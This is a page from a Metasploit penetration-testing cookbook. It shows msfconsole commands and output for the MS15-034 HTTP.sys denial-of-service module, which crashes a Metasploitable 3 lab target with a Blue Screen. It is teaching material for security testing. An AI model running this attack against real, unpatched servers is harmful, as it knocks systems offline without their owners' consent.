you-books.com
Book menu
  1. Abhinav Singh
  2. Metasploit Penetration Testing Cookbook: Evade antiviruses, bypass firewalls, and exploit complex environments with the most widely used penetration testing framework, 3rd Edition
  3. part0333.html
Prev Next

HTTP

We will start by having a look at the MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service auxiliary module. This module checks if hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution.

  1. To use the module, set the target IP address of the Metasploitable 3 target machine and run it:
msf > use auxiliary/dos/http/ms15_034_ulonglongadd
msf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.216.10
RHOSTS => 192.168.216.10
msf auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dos/http/ms15_034_ulonglongadd) >

Looking at the target machine, we can verify that it is vulnerable to this attack, which crashed the machine leaving us with a Blue Screen of Death: 

Prev Next
Metasploit Penetration Testing Cookbook: Evade antiviruses, bypass firewalls, and exploit complex environments with the most widely used penetration testing framework, 3rd Edition
titlepage.xhtml
part0000.html
part0001.html
part0002.html
part0003.html
part0004.html
part0005.html
part0006.html
part0007.html
part0008.html
part0009.html
part0010.html
part0011.html
part0012.html
part0013.html
part0014.html
part0015.html
part0016.html
part0017.html
part0018.html
part0019.html
part0020.html
part0021.html
part0022.html
part0023.html
part0024.html
part0025.html
part0026.html
part0027.html
part0028.html
part0029.html
part0030.html
part0031.html
part0032.html
part0033.html
part0034.html
part0035.html
part0036.html
part0037.html
part0038.html
part0039.html
part0040.html
part0041.html
part0042.html
part0043.html
part0044.html
part0045.html
part0046.html
part0047.html
part0048.html
part0049.html
part0050.html
part0051.html
part0052.html
part0053.html
part0054.html
part0055.html
part0056.html
part0057.html
part0058.html
part0059.html
part0060.html
part0061.html
part0062.html
part0063.html
part0064.html
part0065.html
part0066.html
part0067.html
part0068.html
part0069.html
part0070.html
part0071.html
part0072.html
part0073.html
part0074.html
part0075.html
part0076.html
part0077.html
part0078.html
part0079.html
part0080.html
part0081.html
part0082.html
part0083.html
part0084.html
part0085.html
part0086.html
part0087.html
part0088.html
part0089.html
part0090.html
part0091.html
part0092.html
part0093.html
part0094.html
part0095.html
part0096.html
part0097.html
part0098.html
part0099.html
part0100.html
part0101.html
part0102.html
part0103.html
part0104.html
part0105.html
part0106.html
part0107.html
part0108.html
part0109.html
part0110.html
part0111.html
part0112.html
part0113.html
part0114.html
part0115.html
part0116.html
part0117.html
part0118.html
part0119.html
part0120.html
part0121.html
part0122.html
part0123.html
part0124.html
part0125.html
part0126.html
part0127.html
part0128.html
part0129.html
part0130.html
part0131.html
part0132.html
part0133.html
part0134.html
part0135.html
part0136.html
part0137.html
part0138.html
part0139.html
part0140.html
part0141.html
part0142.html
part0143.html
part0144.html
part0145.html
part0146.html
part0147.html
part0148.html
part0149.html
part0150.html
part0151.html
part0152.html
part0153.html
part0154.html
part0155.html
part0156.html
part0157.html
part0158.html
part0159.html
part0160.html
part0161.html
part0162.html
part0163.html
part0164.html
part0165.html
part0166.html
part0167.html
part0168.html
part0169.html
part0170.html
part0171.html
part0172.html
part0173.html
part0174.html
part0175.html
part0176.html
part0177.html
part0178.html
part0179.html
part0180.html
part0181.html
part0182.html
part0183.html
part0184.html
part0185.html
part0186.html
part0187.html
part0188.html
part0189.html
part0190.html
part0191.html
part0192.html
part0193.html
part0194.html
part0195.html
part0196.html
part0197.html
part0198.html
part0199.html
part0200.html
part0201.html
part0202.html
part0203.html
part0204.html
part0205.html
part0206.html
part0207.html
part0208.html
part0209.html
part0210.html
part0211.html
part0212.html
part0213.html
part0214.html
part0215.html
part0216.html
part0217.html
part0218.html
part0219.html
part0220.html
part0221.html
part0222.html
part0223.html
part0224.html
part0225.html
part0226.html
part0227.html
part0228.html
part0229.html
part0230.html
part0231.html
part0232.html
part0233.html
part0234.html
part0235.html
part0236.html
part0237.html
part0238.html
part0239.html
part0240.html
part0241.html
part0242.html
part0243.html
part0244.html
part0245.html
part0246.html
part0247.html
part0248.html
part0249.html
part0250.html
part0251.html
part0252.html
part0253.html
part0254.html
part0255.html
part0256.html
part0257.html
part0258.html
part0259.html
part0260.html
part0261.html
part0262.html
part0263.html
part0264.html
part0265.html
part0266.html
part0267.html
part0268.html
part0269.html
part0270.html
part0271.html
part0272.html
part0273.html
part0274.html
part0275.html
part0276.html
part0277.html
part0278.html
part0279.html
part0280.html
part0281.html
part0282.html
part0283.html
part0284.html
part0285.html
part0286.html
part0287.html
part0288.html
part0289.html
part0290.html
part0291.html
part0292.html
part0293.html
part0294.html
part0295.html
part0296.html
part0297.html
part0298.html
part0299.html
part0300.html
part0301.html
part0302.html
part0303.html
part0304.html
part0305.html
part0306.html
part0307.html
part0308.html
part0309.html
part0310.html
part0311.html
part0312.html
part0313.html
part0314.html
part0315.html
part0316.html
part0317.html
part0318.html
part0319.html
part0320.html
part0321.html
part0322.html
part0323.html
part0324.html
part0325.html
part0326.html
part0327.html
part0328.html
part0329.html
part0330.html
part0331.html
part0332.html
part0333.html
part0334.html
part0335.html
part0336.html
part0337.html
part0338.html
part0339.html
part0340.html
part0341.html
part0342.html
part0343.html
part0344.html
part0345.html
part0346.html
part0347.html
part0348.html
part0349.html
part0350.html
part0351.html
part0352.html
part0353.html
part0354.html
part0355.html
part0356.html
part0357.html
part0358.html
part0359.html
part0360.html
part0361.html
part0362.html
part0363.html
part0364.html
part0365.html
part0366.html
part0367.html
part0368.html
part0369.html
part0370.html
part0371.html
part0372.html
part0373.html
part0374.html
part0375.html
part0376.html
part0377.html
part0378.html
part0379.html
part0380.html
part0381.html
part0382.html
part0383.html
part0384.html
part0385.html
part0386.html
part0387.html
part0388.html
part0389.html
part0390.html
part0391.html
part0392.html
part0393.html
part0394.html
part0395.html
part0396.html
part0397.html
part0398.html
part0399.html
part0400.html
part0401.html
part0402.html
part0403.html
part0404.html
part0405.html
part0406.html
part0407.html
part0408.html
part0409.html
part0410.html
part0411.html
part0412.html
part0413.html
part0414.html
part0415.html
part0416.html
part0417.html
part0418.html
part0419.html
part0420.html